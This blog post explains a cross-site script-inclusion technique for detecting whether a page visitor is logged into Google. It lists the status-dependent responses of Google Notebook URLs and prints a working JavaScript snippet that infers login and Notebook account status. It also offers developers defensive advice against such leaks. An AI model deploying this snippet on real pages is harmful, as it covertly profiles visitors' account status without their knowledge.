May I know if you are logged into Google? - Mashup Security | Wei Blog 2.0

Are you logged into Google right now? This question, posed by JavaScript guru Kent Brewster, comes from his series of eye-opening How-to-tell studies. Earlier, we saw Kent's hack of Netflix's JavaScript (he has already tackled Twitter and Facebook). Now it's Google's turn. Let’s take a look at his article: *How to Tell if a User is Logged In to Google*.

The article discusses: "What we're looking for is a URL on the target domain that returns a script which varies depending on the user's login status." This opens up a small avenue for obtaining this information. And it works as intended: if you visit his page, you will see information about your login status on Google.

This short snippet of source code exposes some risks inherent in client-side JavaScript. Aggregation applications could potentially execute without drawing your attention. In summary, his series of experiments offers two critical pieces of advice for developers:

- Do not return live JavaScript code that depends on the user's login status.

- Any URL can be included as a script tag and used to detect your status information. If your browser throws different error messages based on your user state, then you may be leaking information.

Another useful tip for developers mentioned in the article is: "Tamper Data is your faithful friend." This is a Mozilla extension that allows you to view and modify HTTP/HTTPS headers and submitted parameters, track and time HTTP requests/responses, and securely test web applications.

Let's take a closer look at how it's done.

First, two URLs on Google were found that depend on the user's status:

One is `http://www.google.com/notebook/read`.

Another is `http://www.google.com/notebook/write`.

- If you are logged into Google and have activated the "NoteBook" application, it returns: `T();`.

- If you are logged into Google but have not activated the "NoteBook" application, it returns: `L('https://www.google.com/accounts/NewServiceAccount?service=notebook&continue=http%3A%2F%2Fwww.google.com%2Fnotebook%2F&followup=http%3A%2F%2Fwww.google.com%2Fnotebook%2F&hl=en');`.

- If you are not logged into Google, it returns: `L('https://www.google.com/accounts/ServiceLogin?service=notebook&passive=true&nui=1&continue=http%3A%2F%2Fwww.google.com%2Fnotebook%2F&followup=http%3A%2F%2Fwww.google.com%2Fnotebook%2F&hl=en');`.

With that, the following script can determine your login status on Google:

```html

Checking your Google login status.

var L = function(url) {

if (url.match(/ServiceLogin/)) {

document.getElementById('status').innerHTML =

'You are not logged in to Google.';

} else {

document.getElementById('status').innerHTML =

'You are logged in to Google.';

}

};

var T = function() {

document.getElementById('status').innerHTML =

'You are logged in to Google. ' +

'Oh, and you have a Google Notebook account.';

};

var s = document.createElement('SCRIPT');

s.type = 'text/javascript';

s.src = 'http://www.google.com/notebook/read';

document.getElementsByTagName('BODY')[0].appendChild(s);

```

This demonstrates how a simple script can check whether a user is logged into Google and even detect additional account-specific details like having a Google Notebook account.